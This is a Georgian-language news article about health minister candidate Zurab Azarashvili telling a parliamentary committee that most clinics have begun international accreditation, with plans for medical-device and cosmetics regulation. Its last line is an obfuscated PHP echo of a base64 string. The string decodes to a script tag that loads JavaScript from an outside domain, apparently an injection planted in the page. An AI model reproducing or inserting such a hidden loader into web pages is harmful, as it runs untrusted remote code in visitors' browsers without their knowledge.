celsiusi
ავერსი შნაიდერი

 ჯანდაცვის მინისტრობის კანდიდატ ზურაბ აზარაშვილის განცხადებით, კლინიკების 80%-მა უკვე დაიწყო საერთაშორისო აკრედიტაციის გავლის პროცესი. ამის შესახებ პარლამენტში, განათლების და მეცნიერების კომიტეტზე განაცხადა, სადაც მინისტრობის კანდიდატები დეპუტატებს სამთავრობო პროგრამას აცნობენ.

„ქვეყანაში ყველა პირობა იქმნება იმისთვის, რომ სამედიცინო ხარისხი გაუთანაბრდეს საერთაშორისო სტანდარტს. 2023 წლიდან საერთაშორისო აკრედიტაციის ვალდებულების შემოღების საპასუხოდ, კლინიკების 80%-ზე მეტმა უკვე დაიწყო საერთაშორისო აკრედიტაციის პროცესი, რაც 2025 წლიდან საყოველთაო ჯანდაცვის პროგრამაში მონაწილეობის მთავარი პირობა იქნება.

აუცილებლად უნდა აღინიშნოს, რომ ასოცირების ხელშეკრულების ფარგლებში სამინისტრო მუშაობს განახლებული საკანონმდებლო ჩარჩოს შესაბამისად. საკანონმდებლო ორგანოში წარმოსადგენად მზად არის სამედიცინო მოწყობილობის შესახებ შემუშავებული ახალი კანონპროექტი“, - განაცხადა აზარაშვილმა.

გარდა ამისა, ზურაბ აზარაშვილის თქმით, იგეგმება იმპორტირებული კოსმეტიკური საშუალებების რეგულირება, ქიმიური უსაფრთხოების სტანდარტების დაცვის მიზნით. სამინისტროში ამბობენ, რომ საკითხზე ჯერ მუშაობა მიმდინარეობს და მეტ დეტალს ვერ დაასახელებენ.

269
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");